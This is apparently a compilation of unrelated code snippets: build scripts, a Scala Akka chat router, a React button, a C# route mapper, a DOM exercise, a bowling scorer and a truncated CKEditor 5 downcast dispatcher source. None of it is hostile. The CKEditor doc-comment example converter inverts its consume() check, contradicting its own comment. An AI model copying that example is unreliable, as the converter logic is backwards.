echo 'cannot find sel_ldr_x86_32' 1>&2
exit 1
fi
;;
arm)
if ! which sel_ldr_arm >/dev/null; then
echo 'cannot find sel_ldr_arm' 1>&2
exit 1
fi
;;
*)
echo 'unsupported $GOARCH for nacl: '"$naclGOARCH" 1>&2
exit 1
esac

# The exec wrapper script is also required to run the generated binaries.
if ! which go_nacl_${naclGOARCH}_exec >/dev/null; then
echo "cannot find go_nacl_${naclGOARCH}_exec, see ../misc/nacl/README." 1>&2
exit 1
fi

# Run host build to get toolchain for running zip generator.
unset GOOS GOARCH
if [ ! -f make.bash ]; then
echo 'nacl.bash must be run from $GOROOT/src' 1>&2
exit 1
fi
GOOS=$GOHOSTOS GOARCH=$GOHOSTARCH ./make.bash

# the builder might have set GOROOT_FINAL.
export GOROOT=$(pwd)/..

# Build zip file embedded in package syscall.
gobin=${GOBIN:-$(pwd)/../bin}
rm -f syscall/fstest_nacl.go
GOOS=$GOHOSTOS GOARCH=$GOHOSTARCH $gobin/go run ../misc/nacl/mkzip.go -p syscall -r .. ../misc/nacl/testzip.proto syscall/fstest_nacl.go

# Run standard build and tests.
export PATH=$(pwd)/../misc/nacl:$PATH
GOOS=nacl GOARCH=$naclGOARCH ./all.bash --no-clean
|
/// Forwards a network result to the completion handler unchanged.
/// The result has exactly two cases (`.success`/`.failure`), so passing it
/// through directly is equivalent to unpacking and re-wrapping each case.
func processNetworkResult<T>(_ result: NetworkResult<T>, completion: @escaping (NetworkResult<T>) -> Void) {
    completion(result)
}
|
# Install the Ruby gems pinned by the Gemfile, then run this project's
# fastlane `prep` lane through bundler.
bundle install
bundle exec fastlane prep
|
package com.lbs.server.conversation
import akka.actor.{ActorSystem, Cancellable}
import com.lbs.bot.model.{Command, MessageSource}
import com.lbs.common.Logger
import com.lbs.server.conversation.Account.SwitchAccount
import com.lbs.server.conversation.base.Conversation
import scala.collection.mutable
import scala.concurrent.ExecutionContextExecutor
import scala.concurrent.duration.DurationLong
/**
 * Routes incoming bot messages to a per-chat [[Auth]] conversation, creating
 * conversations lazily per message source and destroying them after a period
 * of inactivity.
 */
class Router(authFactory: MessageSourceTo[Auth])(val actorSystem: ActorSystem) extends Conversation[Unit] with Logger {

  // Internal message scheduled when a chat has been idle for `idleTimeout`.
  private case class DestroyChat(source: MessageSource)

  // Live Auth conversation per message source (chat).
  private val chats = mutable.Map.empty[MessageSource, Auth]
  // Pending idle-destruction timer per message source.
  private val timers = mutable.Map.empty[MessageSource, Cancellable]
  // Inactivity window after which an idle chat is torn down.
  private val idleTimeout = 1.hour

  private implicit val dispatcher: ExecutionContextExecutor = actorSystem.dispatcher

  entryPoint(routeMessage)

  // Single monologue step: dispatch commands to per-source chats and handle
  // the Router's own housekeeping messages.
  private def routeMessage: Step =
    monologue {
      case Msg(cmd@Command(source, _, _), _) =>
        val chat = instantiateChatOrGet(source)
        chat ! cmd
        stay()
      case Msg(DestroyChat(source), _) =>
        info(s"Destroying chat for $source due to $idleTimeout of inactivity")
        destroyChat(source)
        stay()
      case Msg(SwitchAccount(userId), _) =>
        switchAccount(userId)
        stay()
      case msg: Msg =>
        info(s"Unknown message received: $msg")
        stay()
    }

  // Returns the existing chat for `source` or creates one; every routed
  // command also re-arms the idle-destruction timer for that source.
  private def instantiateChatOrGet(source: MessageSource) = {
    scheduleIdleChatDestroyer(source)
    chats.getOrElseUpdate(source, authFactory(source))
  }

  private def destroyChat(source: MessageSource): Unit = {
    timers.remove(source)
    removeChat(source)
  }

  // Replaces the chat for the user's source with a fresh Auth conversation.
  private def switchAccount(userId: Login.UserId): Unit = {
    removeChat(userId.source)
    chats += userId.source -> authFactory(userId.source)
  }

  private def removeChat(source: MessageSource): Unit = {
    chats.remove(source).foreach(_.destroy())
  }

  // Cancels any previous timer for `source` and schedules a new DestroyChat
  // message to self after `idleTimeout`.
  private def scheduleIdleChatDestroyer(source: MessageSource): Unit = {
    timers.remove(source).foreach(_.cancel())
    val cancellable = actorSystem.scheduler.scheduleOnce(idleTimeout) {
      self ! DestroyChat(source)
    }
    timers += source -> cancellable
  }

  // Tear down every remaining chat when the Router itself is destroyed.
  beforeDestroy {
    chats.foreach(chat => destroyChat(chat._1))
  }
}
|
import { useState } from 'react';
import styled from 'styled-components';
export default (props) => {
const [hover, setHover] = useState(false);
return (
<Button
{...props}
hover={hover}
onFocus={() => setHover(true)}
onMouseEnter={() => setHover(true)}
onBlur={() => setHover(false)}
onMouseLeave={() => setHover(false)}
>
<ButtonBorder
hover={hover}
size={props.size}
color={props.color}
hoverColor={props.hoverColor}
/>
{props.children}
</Button>
);
};
// Circular overlay that expands around the button while it is hovered/focused.
//
// BUG FIX: the original interpolated `${({ hover }) => !hover}` directly into
// the CSS, which renders the literal text "true"/"false" into the stylesheet
// instead of conditionally applying the following block — so the expanded
// border never appeared. Judging by the prop name `hoverColor`, the expansion
// is intended to show while hovered, so the block is now emitted only when
// `hover` is true (assumption: review against the original design).
const ButtonBorder = styled.div`
  position: absolute;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  border-radius: 50%;
  ${({ hover, size, hoverColor }) =>
    hover &&
    `
    left: -20%;
    top: -20%;
    width: 140%;
    height: 140%;
    border: calc(${size}/12) solid ${hoverColor};
  `}
  transition: background 0.2s,
    border 0.2s,
    left 0.2s,
    top 0.2s,
    width 0.2s,
    height 0.2s;
`;
// The round button itself; swaps its background color while hovered/focused.
//
// BUG FIX: as with ButtonBorder, `${({ hover }) => !hover}` rendered the
// literal text "true"/"false" into the CSS instead of conditionally applying
// the block, so the hover background never applied. The block is now emitted
// only when `hover` is true (intent inferred from the `hoverColor` prop name).
// Also terminated the final `transition` declaration, which was missing its
// trailing semicolon.
const Button = styled.button`
  position: relative;
  width: ${({ size }) => size};
  height: ${({ size }) => size};
  border: 0;
  border-radius: 50%;
  background-color: ${({ color }) => color};
  font-size: calc(${({ size }) => size}/2);
  display: flex;
  justify-content: center;
  align-items: center;
  ${({ hover, hoverColor }) => hover && `background-color: ${hoverColor};`}
  transition: background 0.2s,
    border 0.2s,
    left 0.2s,
    top 0.2s;
`;
|
/// <summary>
/// Maps request URLs to controller actions using registered URL patterns.
/// </summary>
public class RouteMapper
{
    // Registered pattern -> "Controller.Action" lookup.
    private Dictionary<string, string> routeMappings;

    public RouteMapper()
    {
        routeMappings = new Dictionary<string, string>();
    }

    /// <summary>Registers (or overwrites) a mapping from a URL pattern to a controller action.</summary>
    public void AddRouteMapping(string urlPattern, string controllerAction)
    {
        routeMappings[urlPattern] = controllerAction;
    }

    /// <summary>
    /// Returns the controller action for the first registered pattern that
    /// matches <paramref name="url"/>, or a sentinel message when none match.
    /// </summary>
    public string MapUrlToControllerAction(string url)
    {
        foreach (var entry in routeMappings)
        {
            bool matches = IsUrlMatchingPattern(url, entry.Key);
            if (!matches)
            {
                continue;
            }
            return entry.Value;
        }
        return "No matching route found";
    }

    // Pattern-matching hook. Currently an exact string comparison; a real
    // implementation could use regular expressions or segment parsing.
    private bool IsUrlMatchingPattern(string url, string pattern)
    {
        return url == pattern;
    }
}
|
// --- Element handles ------------------------------------------------------
const introPic = document.getElementById('changePic');
const bottonNewName = document.getElementById('newName');
let spanName = document.getElementById('name');
let pink = document.querySelectorAll('.pink-bg');
const pinkText = document.querySelectorAll('.pink-text');
const links = document.querySelectorAll('a');
let listaModify = document.querySelector('#front-dev-tools');
const bottomModify = document.getElementById('modifyTechnologies');
const moreSkills = document.getElementById('addingToList');//input field;
const buttomSubmitSkills = document.getElementById('listButtom');//boton
const listBackend = document.getElementById("dev-tools-back-list");//backend list

console.log(moreSkills, buttomSubmitSkills);

//ALL EVENT LISTENERS:
//change pic: swap the intro image for the WCS logo and make it circular.
introPic.addEventListener('click', () => {
introPic.style.borderRadius = '50%';
introPic.src = 'image/logo-wcs.png';
introPic.style.width = '11.5vw';
});

//change name and color: prompt for a name and a color, then re-theme the page.
bottonNewName.addEventListener('click', () => {
let newName = prompt("Please enter your name");
let newColor = prompt("Please enter your favorite color");
spanName.textContent = newName;
spanName.style.color = 'white';
// pink.style.backgroundColor = '#750ff7';
// Apply the chosen color to every pink background and pink text element.
pink.forEach(el => el.style.backgroundColor = newColor);
pinkText.forEach(el => el.style.color = newColor);
//add class to anchor:
links.forEach(el => el.classList.add('purple-text'))
});

// Replace the front-end tools list with a fixed set of entries.
bottomModify.addEventListener('click', () => {
const newContent = ['VSCode', 'Github', 'Terminal'];
// Empty the list before appending the new items.
while (listaModify.firstChild) {
listaModify.removeChild(listaModify.firstChild);
};
newContent.forEach(el => {
// document.createElement('li').innerHTML = el;
let lista = document.createElement('li');
lista.innerHTML = el;
listaModify.appendChild(lista);
});
// listaModify
})

//adding skills to backend list: append the input value as a new <li>, then clear the input.
buttomSubmitSkills.addEventListener('click', () => {
let adding = moreSkills.value;
let nuevaLista = document.createElement('li');
nuevaLista.innerHTML = adding;
listBackend.appendChild(nuevaLista);
moreSkills.value = '';
})
|
<filename>src/interfaces/requests/list-meeting-registrants.ts<gh_stars>1-10
import { RegistrantStatus } from '../constants';
/**
 * Parameters for a "list meeting registrants" API request.
 */
export interface GetListMeetingRegistrantsParams {
  // Identifier of the meeting whose registrants are being listed.
  meetingId: number;
  // Optional query-string parameters forwarded to the API (occurrence filter,
  // registrant status filter, and pagination controls).
  queryParams?: {
    occurrence_id?: string;
    status?: RegistrantStatus;
    page_size?: number;
    page_number?: number;
    next_page_token?: string;
  };
}
|
package com.timwang.algorithm.warmup.bowling;
import com.timwang.algorithm.warmup.bowling.calculate.BowlingRoundCalculator;
import com.timwang.algorithm.warmup.bowling.roll.BowlingRoll;
import com.timwang.algorithm.warmup.bowling.round.BowlingRound;
import com.timwang.algorithm.warmup.bowling.rule.SpareAddScoreRule;
import com.timwang.algorithm.warmup.bowling.rule.StrikeAddScoreRule;
// Please don't modify the class name.
/**
 * Bowling game scoring facade: records pin counts per roll and computes the
 * total score by running a calculator with pluggable spare/strike bonus rules.
 */
public class Bowling {
    // Round structure holding all rolls recorded so far.
    private BowlingRound bowlingRound = BowlingRoll.init();

    // Please don't modify the signature of this method.
    /** Records a roll that knocked down {@code n} pins. */
    public void roll(int n) {
        BowlingRoll.rollN(bowlingRound, n);
    }

    // Please don't modify the signature of this method.
    /**
     * Computes the current total score: a fresh calculator is built per call
     * with the spare and strike bonus rules registered in that order.
     */
    public int getScore() {
        BowlingRoundCalculator calculator = new BowlingRoundCalculator();
        calculator.addRule(new SpareAddScoreRule());
        calculator.addRule(new StrikeAddScoreRule());
        return calculator.calculate(bowlingRound);
    }

    // Debug helper delegating to the round's linked-string representation.
    // NOTE(review): despite the name, this returns void — presumably it prints
    // rather than returning a string; confirm against BowlingRound.
    public void toLinkedString() {
        bowlingRound.toLinkedString();
    }
}
|
// Barrel file: re-exports the sibling modules from this directory.
export { name } from "./name"
export { description } from "./description"
export { uniqueName } from "./uniqueName"
|
# Decode base64 from stdin into scrollbar.png.
# NOTE(review): the piped input is an empty string, so this produces an empty
# file — presumably the base64 payload was stripped from this line; confirm.
# Also note `-D`/`-o` are the macOS base64 flags (GNU coreutils uses `-d` and
# a shell redirect), so this line is macOS-specific.
echo "" | base64 -D -o scrollbar.png
|
/**
* @license Copyright (c) 2003-2020, CKSource - <NAME>. All rights reserved.
* For licensing, see LICENSE.md or https://ckeditor.com/legal/ckeditor-oss-license
*/
/**
* @module engine/conversion/downcastdispatcher
*/
import Consumable from './modelconsumable';
import Range from '../model/range';
import EmitterMixin from '@ckeditor/ckeditor5-utils/src/emittermixin';
import mix from '@ckeditor/ckeditor5-utils/src/mix';
/**
* Downcast dispatcher is a central point of downcasting (conversion from the model to the view), which is a process of reacting to changes
* in the model and firing a set of events. Callbacks listening to these events are called converters. The
* converters' role is to convert the model changes to changes in view (for example, adding view nodes or
* changing attributes on view elements).
*
* During the conversion process, downcast dispatcher fires events basing on the state of the model and prepares
* data for these events. It is important to understand that the events are connected with the changes done on the model,
* for example: "a node has been inserted" or "an attribute has changed". This is in contrary to upcasting (a view-to-model conversion)
* where you convert the view state (view nodes) to a model tree.
*
* The events are prepared basing on a diff created by {@link module:engine/model/differ~Differ Differ}, which buffers them
* and then passes to the downcast dispatcher as a diff between the old model state and the new model state.
*
* Note that because the changes are converted, there is a need to have a mapping between the model structure and the view structure.
* To map positions and elements during the downcast (a model-to-view conversion), use {@link module:engine/conversion/mapper~Mapper}.
*
* Downcast dispatcher fires the following events for model tree changes:
*
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:insert `insert`} –
* If a range of nodes was inserted to the model tree.
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:remove `remove`} –
* If a range of nodes was removed from the model tree.
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:attribute `attribute`} –
* If an attribute was added, changed or removed from a model node.
*
* For {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:insert `insert`}
* and {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:attribute `attribute`},
* downcast dispatcher generates {@link module:engine/conversion/modelconsumable~ModelConsumable consumables}.
* These are used to have control over which changes have already been consumed. It is useful when some converters
* overwrite others or convert multiple changes (for example, it converts an insertion of an element and also converts that
* element's attributes during the insertion).
*
* Additionally, downcast dispatcher fires events for {@link module:engine/model/markercollection~Marker marker} changes:
*
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:addMarker} – If a marker was added.
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:removeMarker} – If a marker was removed.
*
* Note that changing a marker is done through removing the marker from the old range and adding it on the new range,
* so both events are fired.
*
* Finally, downcast dispatcher also handles firing events for the {@link module:engine/model/selection model selection}
* conversion:
*
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:selection}
* – Converts the selection from the model to the view.
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:attribute}
* – Fired for every selection attribute.
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:addMarker}
* – Fired for every marker that contains a selection.
*
* Unlike model tree and markers, events for selection are not fired for changes but for selection state.
*
* When providing custom listeners for downcast dispatcher, remember to check whether a given change has not been
* {@link module:engine/conversion/modelconsumable~ModelConsumable#consume consumed} yet.
*
* When providing custom listeners for downcast dispatcher, keep in mind that any callback that has
* {@link module:engine/conversion/modelconsumable~ModelConsumable#consume consumed} a value from a consumable and
* converted the change should also stop the event (for efficiency purposes).
*
* When providing custom listeners for downcast dispatcher, remember to use the provided
* {@link module:engine/view/downcastwriter~DowncastWriter view downcast writer} to apply changes to the view document.
*
* You can read more about conversion in the following guides:
*
* * {@glink framework/guides/deep-dive/conversion/conversion-introduction Advanced conversion concepts — attributes}
* * {@glink framework/guides/deep-dive/conversion/conversion-extending-output Extending the editor output }
* * {@glink framework/guides/deep-dive/conversion/custom-element-conversion Custom element conversion}
*
* An example of a custom converter for the downcast dispatcher:
*
* // You will convert inserting a "paragraph" model element into the model.
* downcastDispatcher.on( 'insert:paragraph', ( evt, data, conversionApi ) => {
* // Remember to check whether the change has not been consumed yet and consume it.
* if ( conversionApi.consumable.consume( data.item, 'insert' ) ) {
* return;
* }
*
* // Translate the position in the model to a position in the view.
* const viewPosition = conversionApi.mapper.toViewPosition( data.range.start );
*
* // Create a <p> element that will be inserted into the view at the `viewPosition`.
* const viewElement = conversionApi.writer.createContainerElement( 'p' );
*
* // Bind the newly created view element to the model element so positions will map accordingly in the future.
* conversionApi.mapper.bindElements( data.item, viewElement );
*
* // Add the newly created view element to the view.
* conversionApi.writer.insert( viewPosition, viewElement );
*
* // Remember to stop the event propagation.
* evt.stop();
* } );
*/
export default class DowncastDispatcher {
	/**
	 * Creates a downcast dispatcher instance.
	 *
	 * @see module:engine/conversion/downcastdispatcher~DowncastConversionApi
	 * @param {Object} conversionApi Additional properties for an interface that will be passed to events fired
	 * by the downcast dispatcher.
	 */
	constructor( conversionApi ) {
		/**
		 * An interface passed by the dispatcher to the event callbacks.
		 *
		 * @member {module:engine/conversion/downcastdispatcher~DowncastConversionApi}
		 */
		// The dispatcher exposes itself to converters through `conversionApi.dispatcher`.
		this.conversionApi = Object.assign( { dispatcher: this }, conversionApi );
	}
	/**
	 * Takes a {@link module:engine/model/differ~Differ model differ} object with buffered changes and fires conversion basing on it.
	 *
	 * Conversion order: marker removals first, then tree changes (insert/remove/attribute),
	 * then a refresh of markers the mapper reports as unbound, and finally marker additions.
	 *
	 * @param {module:engine/model/differ~Differ} differ The differ object with buffered changes.
	 * @param {module:engine/model/markercollection~MarkerCollection} markers Markers connected with the converted model.
	 * @param {module:engine/view/downcastwriter~DowncastWriter} writer The view writer that should be used to modify the view document.
	 */
	convertChanges( differ, markers, writer ) {
		// Before the view is updated, remove markers which have changed.
		for ( const change of differ.getMarkersToRemove() ) {
			this.convertMarkerRemove( change.name, change.range, writer );
		}

		// Convert changes that happened on model tree.
		for ( const entry of differ.getChanges() ) {
			if ( entry.type == 'insert' ) {
				this.convertInsert( Range._createFromPositionAndShift( entry.position, entry.length ), writer );
			} else if ( entry.type == 'remove' ) {
				this.convertRemove( entry.position, entry.length, entry.name, writer );
			} else {
				// entry.type == 'attribute'.
				this.convertAttribute( entry.range, entry.attributeKey, entry.attributeOldValue, entry.attributeNewValue, writer );
			}
		}

		// Markers reported by the mapper as no longer bound to the view are
		// re-converted on their current range (removed, then added back).
		for ( const markerName of this.conversionApi.mapper.flushUnboundMarkerNames() ) {
			const markerRange = markers.get( markerName ).getRange();

			this.convertMarkerRemove( markerName, markerRange, writer );
			this.convertMarkerAdd( markerName, markerRange, writer );
		}

		// After the view is updated, convert markers which have changed.
		for ( const change of differ.getMarkersToAdd() ) {
			this.convertMarkerAdd( change.name, change.range, writer );
		}
	}
	/**
	 * Starts a conversion of a range insertion.
	 *
	 * For each node in the range, {@link #event:insert `insert` event is fired}. For each attribute on each node,
	 * {@link #event:attribute `attribute` event is fired}.
	 *
	 * @fires insert
	 * @fires attribute
	 * @param {module:engine/model/range~Range} range The inserted range.
	 * @param {module:engine/view/downcastwriter~DowncastWriter} writer The view writer that should be used to modify the view document.
	 */
	convertInsert( range, writer ) {
		this.conversionApi.writer = writer;

		// Create a list of things that can be consumed, consisting of nodes and their attributes.
		this.conversionApi.consumable = this._createInsertConsumable( range );

		// Fire a separate insert event for each node and text fragment contained in the range.
		for ( const value of range ) {
			const item = value.item;
			const itemRange = Range._createFromPositionAndShift( value.previousPosition, value.length );
			// Note: the same `data` object is reused (mutated) for the attribute events fired below.
			const data = {
				item,
				range: itemRange
			};

			this._testAndFire( 'insert', data );

			// Fire a separate addAttribute event for each attribute that was set on inserted items.
			// This is important because most attributes converters will listen only to add/change/removeAttribute events.
			// If we would not add this part, attributes on inserted nodes would not be converted.
			for ( const key of item.getAttributeKeys() ) {
				data.attributeKey = key;
				data.attributeOldValue = null;
				data.attributeNewValue = item.getAttribute( key );

				this._testAndFire( `attribute:${ key }`, data );
			}
		}

		this._clearConversionApi();
	}
	/**
	 * Fires conversion of a single node removal. Fires {@link #event:remove remove event} with provided data.
	 *
	 * Note that no consumable is created here — the event carries only the
	 * removal position and offset size.
	 *
	 * @param {module:engine/model/position~Position} position Position from which node was removed.
	 * @param {Number} length Offset size of removed node.
	 * @param {String} name Name of removed node.
	 * @param {module:engine/view/downcastwriter~DowncastWriter} writer View writer that should be used to modify view document.
	 */
	convertRemove( position, length, name, writer ) {
		this.conversionApi.writer = writer;

		this.fire( 'remove:' + name, { position, length }, this.conversionApi );

		this._clearConversionApi();
	}
	/**
	 * Starts conversion of attribute change on given `range`.
	 *
	 * For each node in the given `range`, {@link #event:attribute attribute event} is fired with the passed data.
	 *
	 * @fires attribute
	 * @param {module:engine/model/range~Range} range Changed range.
	 * @param {String} key Key of the attribute that has changed.
	 * @param {*} oldValue Attribute value before the change or `null` if the attribute has not been set before.
	 * @param {*} newValue New attribute value or `null` if the attribute has been removed.
	 * @param {module:engine/view/downcastwriter~DowncastWriter} writer View writer that should be used to modify view document.
	 */
	convertAttribute( range, key, oldValue, newValue, writer ) {
		this.conversionApi.writer = writer;

		// Create a list with attributes to consume.
		this.conversionApi.consumable = this._createConsumableForRange( range, `attribute:${ key }` );

		// Create a separate attribute event for each node in the range.
		for ( const value of range ) {
			const item = value.item;
			const itemRange = Range._createFromPositionAndShift( value.previousPosition, value.length );
			// A fresh `data` object per item — unlike convertInsert, nothing is reused across iterations.
			const data = {
				item,
				range: itemRange,
				attributeKey: key,
				attributeOldValue: oldValue,
				attributeNewValue: newValue
			};

			this._testAndFire( `attribute:${ key }`, data );
		}

		this._clearConversionApi();
	}
	/**
	 * Starts model selection conversion.
	 *
	 * Fires events for given {@link module:engine/model/selection~Selection selection} to start selection conversion.
	 *
	 * @fires selection
	 * @fires addMarker
	 * @fires attribute
	 * @param {module:engine/model/selection~Selection} selection Selection to convert.
	 * @param {module:engine/model/markercollection~MarkerCollection} markers Markers connected with converted model.
	 * @param {module:engine/view/downcastwriter~DowncastWriter} writer View writer that should be used to modify view document.
	 */
	convertSelection( selection, markers, writer ) {
		const markersAtSelection = Array.from( markers.getMarkersAtPosition( selection.getFirstPosition() ) );

		this.conversionApi.writer = writer;
		this.conversionApi.consumable = this._createSelectionConsumable( selection, markersAtSelection );

		this.fire( 'selection', { selection }, this.conversionApi );

		// Marker and attribute events below are fired only for a collapsed selection.
		if ( !selection.isCollapsed ) {
			return;
		}

		for ( const marker of markersAtSelection ) {
			const markerRange = marker.getRange();

			if ( !shouldMarkerChangeBeConverted( selection.getFirstPosition(), marker, this.conversionApi.mapper ) ) {
				continue;
			}

			const data = {
				item: selection,
				markerName: marker.name,
				markerRange
			};

			if ( this.conversionApi.consumable.test( selection, 'addMarker:' + marker.name ) ) {
				this.fire( 'addMarker:' + marker.name, data, this.conversionApi );
			}
		}

		for ( const key of selection.getAttributeKeys() ) {
			const data = {
				item: selection,
				range: selection.getFirstRange(),
				attributeKey: key,
				attributeOldValue: null,
				attributeNewValue: selection.getAttribute( key )
			};

			// Do not fire event if the attribute has been consumed.
			if ( this.conversionApi.consumable.test( selection, 'attribute:' + data.attributeKey ) ) {
				this.fire( 'attribute:' + data.attributeKey + ':$text', data, this.conversionApi );
			}
		}

		this._clearConversionApi();
	}
	/**
	 * Converts added marker. Fires {@link #event:addMarker addMarker} event for each item
	 * in marker's range. If range is collapsed single event is dispatched. See event description for more details.
	 *
	 * @fires addMarker
	 * @param {String} markerName Marker name.
	 * @param {module:engine/model/range~Range} markerRange Marker range.
	 * @param {module:engine/view/downcastwriter~DowncastWriter} writer View writer that should be used to modify view document.
	 */
	convertMarkerAdd( markerName, markerRange, writer ) {
		// Do not convert if range is in graveyard or not in the document (e.g. in DocumentFragment).
		if ( !markerRange.root.document || markerRange.root.rootName == '$graveyard' ) {
			return;
		}

		this.conversionApi.writer = writer;

		// In markers' case, event name == consumable name.
		const eventName = 'addMarker:' + markerName;

		//
		// First, fire an event for the whole marker.
		//
		const consumable = new Consumable();
		consumable.add( markerRange, eventName );

		this.conversionApi.consumable = consumable;

		this.fire( eventName, { markerName, markerRange }, this.conversionApi );

		//
		// Do not fire events for each item inside the range if the range got consumed.
		// (A converter that handled the whole marker consumes the range-level value.)
		//
		if ( !consumable.test( markerRange, eventName ) ) {
			return;
		}

		//
		// Then, fire an event for each item inside the marker range.
		//
		this.conversionApi.consumable = this._createConsumableForRange( markerRange, eventName );

		for ( const item of markerRange.getItems() ) {
			// Do not fire event for already consumed items.
			if ( !this.conversionApi.consumable.test( item, eventName ) ) {
				continue;
			}

			const data = { item, range: Range._createOn( item ), markerName, markerRange };

			this.fire( eventName, data, this.conversionApi );
		}

		this._clearConversionApi();
	}
	/**
	 * Fires conversion of marker removal. Fires {@link #event:removeMarker removeMarker} event with provided data.
	 *
	 * Unlike {@link #convertMarkerAdd}, no consumable is created — a single
	 * event is fired for the whole marker.
	 *
	 * @fires removeMarker
	 * @param {String} markerName Marker name.
	 * @param {module:engine/model/range~Range} markerRange Marker range.
	 * @param {module:engine/view/downcastwriter~DowncastWriter} writer View writer that should be used to modify view document.
	 */
	convertMarkerRemove( markerName, markerRange, writer ) {
		// Do not convert if range is in graveyard or not in the document (e.g. in DocumentFragment).
		if ( !markerRange.root.document || markerRange.root.rootName == '$graveyard' ) {
			return;
		}

		this.conversionApi.writer = writer;

		this.fire( 'removeMarker:' + markerName, { markerName, markerRange }, this.conversionApi );

		this._clearConversionApi();
	}
/**
* Creates {@link module:engine/conversion/modelconsumable~ModelConsumable} with values to consume from given range,
* assuming that the range has just been inserted to the model.
*
* @private
* @param {module:engine/model/range~Range} range Inserted range.
* @returns {module:engine/conversion/modelconsumable~ModelConsumable} Values to consume.
*/
_createInsertConsumable( range ) {
const consumable = new Consumable();
for ( const value of range ) {
const item = value.item;
consumable.add( item, 'insert' );
for ( const key of item.getAttributeKeys() ) {
consumable.add( item, 'attribute:' + key );
}
}
return consumable;
}
/**
* Creates {@link module:engine/conversion/modelconsumable~ModelConsumable} with values to consume for given range.
*
* @private
* @param {module:engine/model/range~Range} range Affected range.
* @param {String} type Consumable type.
* @returns {module:engine/conversion/modelconsumable~ModelConsumable} Values to consume.
*/
_createConsumableForRange( range, type ) {
const consumable = new Consumable();
for ( const item of range.getItems() ) {
consumable.add( item, type );
}
return consumable;
}
/**
* Creates {@link module:engine/conversion/modelconsumable~ModelConsumable} with selection consumable values.
*
* @private
* @param {module:engine/model/selection~Selection} selection Selection to create consumable from.
* @param {Iterable.<module:engine/model/markercollection~Marker>} markers Markers which contains selection.
* @returns {module:engine/conversion/modelconsumable~ModelConsumable} Values to consume.
*/
_createSelectionConsumable( selection, markers ) {
const consumable = new Consumable();
consumable.add( selection, 'selection' );
for ( const marker of markers ) {
consumable.add( selection, 'addMarker:' + marker.name );
}
for ( const key of selection.getAttributeKeys() ) {
consumable.add( selection, 'attribute:' + key );
}
return consumable;
}
/**
* Tests passed `consumable` to check whether given event can be fired and if so, fires it.
*
* @private
* @fires insert
* @fires attribute
* @param {String} type Event type.
* @param {Object} data Event data.
*/
_testAndFire( type, data ) {
if ( !this.conversionApi.consumable.test( data.item, type ) ) {
// Do not fire event if the item was consumed.
return;
}
const name = data.item.name || '$text';
this.fire( type + ':' + name, data, this.conversionApi );
}
/**
* Clears conversion API object.
*
* @private
*/
_clearConversionApi() {
delete this.conversionApi.writer;
delete this.conversionApi.consumable;
}
/**
* Fired for inserted nodes.
*
* `insert` is a namespace for a class of events. Names of actually called events follow this pattern:
* `insert:name`. `name` is either `'$text'`, when {@link module:engine/model/text~Text a text node} has been inserted,
* or {@link module:engine/model/element~Element#name name} of inserted element.
*
* This way listeners can either listen to a general `insert` event or specific event (for example `insert:paragraph`).
*
* @event insert
* @param {Object} data Additional information about the change.
* @param {module:engine/model/item~Item} data.item Inserted item.
* @param {module:engine/model/range~Range} data.range Range spanning over inserted item.
* @param {module:engine/conversion/downcastdispatcher~DowncastConversionApi} conversionApi Conversion interface
* to be used by callback, passed in `DowncastDispatcher` constructor.
*/
/**
* Fired for removed nodes.
*
* `remove` is a namespace for a class of events. Names of actually called events follow this pattern:
* `remove:name`. `name` is either `'$text'`, when {@link module:engine/model/text~Text a text node} has been removed,
* or the {@link module:engine/model/element~Element#name name} of removed element.
*
* This way listeners can either listen to a general `remove` event or specific event (for example `remove:paragraph`).
*
* @event remove
* @param {Object} data Additional information about the change.
* @param {module:engine/model/position~Position} data.position Position from which the node has been removed.
* @param {Number} data.length Offset size of the removed node.
* @param {module:engine/conversion/downcastdispatcher~DowncastConversionApi} conversionApi Conversion interface
* to be used by callback, passed in `DowncastDispatcher` constructor.
*/
/**
* Fired in the following cases:
*
* * when an attribute has been added, changed, or removed from a node,
* * when a node with an attribute is inserted,
* * when collapsed model selection attribute is converted.
*
* `attribute` is a namespace for a class of events. Names of actually called events follow this pattern:
* `attribute:attributeKey:name`. `attributeKey` is the key of added/changed/removed attribute.
* `name` is either `'$text'` if change was on {@link module:engine/model/text~Text a text node},
* or the {@link module:engine/model/element~Element#name name} of element which attribute has changed.
*
* This way listeners can either listen to a general `attribute:bold` event or specific event (for example `attribute:src:image`).
*
* @event attribute
* @param {Object} data Additional information about the change.
* @param {module:engine/model/item~Item|module:engine/model/documentselection~DocumentSelection} data.item Changed item
* or converted selection.
* @param {module:engine/model/range~Range} data.range Range spanning over changed item or selection range.
* @param {String} data.attributeKey Attribute key.
* @param {*} data.attributeOldValue Attribute value before the change. This is `null` when selection attribute is converted.
* @param {*} data.attributeNewValue New attribute value.
* @param {module:engine/conversion/downcastdispatcher~DowncastConversionApi} conversionApi Conversion interface
* to be used by callback, passed in `DowncastDispatcher` constructor.
*/
/**
* Fired for {@link module:engine/model/selection~Selection selection} changes.
*
* @event selection
* @param {module:engine/model/selection~Selection} selection Selection that is converted.
* @param {module:engine/conversion/downcastdispatcher~DowncastConversionApi} conversionApi Conversion interface
* to be used by callback, passed in `DowncastDispatcher` constructor.
*/
/**
* Fired when a new marker is added to the model. Also fired when collapsed model selection that is inside a marker is converted.
*
* `addMarker` is a namespace for a class of events. Names of actually called events follow this pattern:
* `addMarker:markerName`. By specifying certain marker names, you can make the events even more gradual. For example,
* if markers are named `foo:abc`, `foo:bar`, then it is possible to listen to `addMarker:foo` or `addMarker:foo:abc` and
* `addMarker:foo:bar` events.
*
* If the marker range is not collapsed:
*
* * the event is fired for each item in the marker range one by one,
* * `conversionApi.consumable` includes each item of the marker range and the consumable value is same as event name.
*
* If the marker range is collapsed:
*
* * there is only one event,
* * `conversionApi.consumable` includes marker range with event name.
*
* If selection inside a marker is converted:
*
* * there is only one event,
* * `conversionApi.consumable` includes selection instance with event name.
*
* @event addMarker
* @param {Object} data Additional information about the change.
